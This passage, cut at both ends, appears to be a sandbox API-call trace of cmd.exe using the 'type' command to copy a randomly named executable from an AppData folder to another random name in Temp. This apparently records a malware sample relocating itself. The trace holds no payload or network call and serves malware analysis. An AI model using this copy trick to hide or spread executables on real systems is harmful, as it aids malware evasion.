LCType=0x24, lpLCData=0x26f6b0, cchData=128 | out: lpLCData="1") returned 2 [0111.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0111.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0111.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0111.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0111.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0111.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0111.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0111.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0111.302] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0111.302] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0111.302] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0111.303] GetConsoleTitleW (in: lpConsoleTitle=0x3d0a10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.303] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0111.303] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0111.303] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0111.303] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0111.304] _wcsicmp (_String1="type", _String2=")") returned 75 [0111.304] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0111.304] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0111.304] _wcsicmp (_String1="IF", _String2="type") returned -11 [0111.304] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0111.304] _wcsicmp (_String1="REM", _String2="type") returned -2 [0111.304] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0111.308] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"") returned 68 [0111.308] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"") returned 68 [0111.308] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"") returned 71 [0111.308] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"") returned 71 [0111.308] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"") returned 80 [0111.308] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"") returned 80 [0111.311] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.311] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.311] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.311] GetFileType (hFile=0x7) returned 0x2 [0111.346] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0111.346] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f544 | out: lpMode=0x26f544) returned 1 [0111.346] _dup (_FileHandle=1) returned 3 [0111.347] _close (_FileHandle=1) returned 0 [0111.347] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe", _String2="con") returned -53 [0111.347] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x26f514, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0111.347] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0111.347] GetConsoleTitleW (in: lpConsoleTitle=0x26f344, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.348] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0111.348] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0111.348] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0111.348] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0111.348] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.349] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x26eea8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eea8) returned 0x3d0f68 [0111.349] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0111.349] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0111.349] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0111.349] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26ddb4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0111.349] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0111.349] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.349] GetFileType (hFile=0x54) returned 0x1 [0111.349] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.349] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x26de0c | out: lpFileSizeHigh=0x26de0c*=0x0) returned 0x7d600 [0111.349] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.349] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.349] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.350] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.351] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.351] GetFileType (hFile=0x4c) returned 0x1 [0111.351] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.351] GetFileType (hFile=0x4c) returned 0x1 [0111.351] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.351] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.352] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.352] GetFileType (hFile=0x4c) returned 0x1 [0111.352] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.352] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.352] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.352] GetFileType (hFile=0x4c) returned 0x1 [0111.352] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.352] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.352] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.352] GetFileType (hFile=0x4c) returned 0x1 [0111.352] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.352] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.352] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.352] GetFileType (hFile=0x4c) returned 0x1 [0111.352] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.352] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.352] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.352] GetFileType (hFile=0x4c) returned 0x1 [0111.352] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.352] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.353] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.353] GetFileType (hFile=0x4c) returned 0x1 [0111.353] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.353] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.353] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.353] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.353] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.353] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.353] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.353] GetFileType (hFile=0x4c) returned 0x1 [0111.353] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.353] GetFileType (hFile=0x4c) returned 0x1 [0111.353] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.353] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.353] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.353] GetFileType (hFile=0x4c) returned 0x1 [0111.353] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.353] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.353] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.353] GetFileType (hFile=0x4c) returned 0x1 [0111.353] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.353] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.353] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.353] GetFileType (hFile=0x4c) returned 0x1 [0111.354] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.354] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.354] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.354] GetFileType (hFile=0x4c) returned 0x1 [0111.354] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.354] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.354] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.354] GetFileType (hFile=0x4c) returned 0x1 [0111.354] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.354] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.354] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.354] GetFileType (hFile=0x4c) returned 0x1 [0111.354] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.354] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.354] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.354] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.354] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.354] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.354] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.354] GetFileType (hFile=0x4c) returned 0x1 [0111.354] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.354] GetFileType (hFile=0x4c) returned 0x1 [0111.354] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.354] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.354] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.354] GetFileType (hFile=0x4c) returned 0x1 [0111.354] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.354] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.354] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.354] GetFileType (hFile=0x4c) returned 0x1 [0111.355] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.355] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.355] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.355] GetFileType (hFile=0x4c) returned 0x1 [0111.355] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.355] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.355] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.355] GetFileType (hFile=0x4c) returned 0x1 [0111.355] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.355] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.355] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.355] GetFileType (hFile=0x4c) returned 0x1 [0111.355] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.355] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.355] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.355] GetFileType (hFile=0x4c) returned 0x1 [0111.355] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.355] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.355] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.355] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.355] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.355] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.355] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.355] GetFileType (hFile=0x4c) returned 0x1 [0111.355] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.355] GetFileType (hFile=0x4c) returned 0x1 [0111.355] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.355] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.355] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.355] GetFileType (hFile=0x4c) returned 0x1 [0111.356] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.356] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.356] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.356] GetFileType (hFile=0x4c) returned 0x1 [0111.356] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.356] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.356] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.356] GetFileType (hFile=0x4c) returned 0x1 [0111.356] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.356] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.356] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.356] GetFileType (hFile=0x4c) returned 0x1 [0111.356] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.356] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.356] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.356] GetFileType (hFile=0x4c) returned 0x1 [0111.356] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.356] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.356] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.356] GetFileType (hFile=0x4c) returned 0x1 [0111.356] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.356] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.356] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.356] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.356] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.356] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.356] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.356] GetFileType (hFile=0x4c) returned 0x1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] GetFileType (hFile=0x4c) returned 0x1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] GetFileType (hFile=0x4c) returned 0x1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] GetFileType (hFile=0x4c) returned 0x1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] GetFileType (hFile=0x4c) returned 0x1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] GetFileType (hFile=0x4c) returned 0x1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] GetFileType (hFile=0x4c) returned 0x1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] GetFileType (hFile=0x4c) returned 0x1 [0111.357] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.357] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.357] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.357] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.358] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.358] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] GetFileType (hFile=0x4c) returned 0x1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] GetFileType (hFile=0x4c) returned 0x1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] GetFileType (hFile=0x4c) returned 0x1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] GetFileType (hFile=0x4c) returned 0x1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] GetFileType (hFile=0x4c) returned 0x1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] GetFileType (hFile=0x4c) returned 0x1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] WriteFile (in: 